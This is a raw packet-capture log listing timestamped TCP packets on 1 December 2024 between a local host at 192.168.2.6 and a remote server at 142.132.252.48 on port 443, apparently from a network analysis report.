                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.820714951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.820739031 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.826042891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.826070070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.826103926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.826112032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.826131105 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.826147079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.830563068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.831757069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.831783056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.831823111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.831830025 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.831861019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.831878901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.836708069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.836735010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.836770058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.836775064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.836797953 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.836815119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.840096951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.842061043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.842082977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.842117071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.842127085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.842152119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.842166901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.848026991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.848046064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.848079920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.848088026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.848110914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.848128080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.853425026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.853441954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.853472948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.853483915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.853502989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.853521109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:52.880426884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.018307924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.018336058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.018457890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.018469095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.018546104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.024003029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.024029016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.024117947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.024126053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.024168968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.029701948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.029730082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.029795885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.029803991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.029848099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.034630060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.034656048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.034693003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.034699917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.034734011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.034761906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.040584087 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.040607929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.040654898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.040661097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.040689945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.040705919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.046080112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.046109915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.046143055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.046154976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.046171904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.046192884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.046487093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.052814007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.052833080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.052915096 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.052915096 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.052923918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.053010941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.057009935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.057034016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.057113886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.057121038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.057168007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.072093964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.220055103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.220078945 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.220314026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.220334053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.220630884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.225006104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.225023985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.225114107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.225130081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.228595018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.230849981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.230866909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.230930090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.230942011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.232592106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.236366987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.236385107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.236478090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.236484051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.236583948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.242280006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.242295980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.242383003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.242388964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.244615078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.247250080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.247266054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.247339010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.247345924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.247440100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.252676010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.252692938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.252832890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.252844095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.252907991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.258091927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.258109093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.258198977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.258208990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.258305073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.421811104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.421838999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.421987057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.421987057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.421996117 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.422061920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.426738024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.426763058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.426803112 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.426809072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.426877975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.426877975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.432445049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.432471991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.432648897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.432656050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.432710886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.437968016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.437994957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.438036919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.438041925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.438114882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.438114882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.442974091 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.443000078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.443046093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.443051100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.443094969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.443094969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.448692083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.448714972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.448750019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.448755980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.448791027 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.448803902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.454253912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.454276085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.454338074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.454346895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.454355955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.454402924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.459099054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.459741116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.459767103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.459820032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.459825993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.459911108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.459911108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.471450090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.623233080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.623265982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.623424053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.623433113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.623507023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.628166914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.628191948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.628278971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.628285885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.628362894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.633900881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.633918047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.633985996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.633991957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.634041071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.639806032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.639823914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.639883995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.639890909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.639985085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.646817923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.646836996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.646907091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.646913052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.646961927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.651055098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.651072979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.651125908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.651135921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.651177883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.655498028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.655528069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.655544043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.655596018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.655605078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.655616999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.655639887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.661164045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.661181927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.661251068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.661262989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.661324978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.661844969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.824074030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.824100971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.824191093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.824206114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.824266911 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.829694986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.829711914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.829801083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.829801083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.829808950 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.829855919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.835419893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.835443974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.835489035 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.835494995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.835565090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.835565090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.841027975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.841048002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.841114044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.841121912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.841175079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.846291065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.846309900 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.846435070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.846441984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.846498013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.851613998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.851630926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.851680040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.851695061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.851726055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.857004881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.857022047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.857140064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.857152939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.857204914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.857992887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.862682104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.862701893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.862766027 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.862776995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.862833023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:53.865612984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.025883913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.025921106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.025976896 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.026004076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.026021957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.026057959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.031723976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.031750917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:54.031812906 CET49721443192.168.2.6142.132.252.48
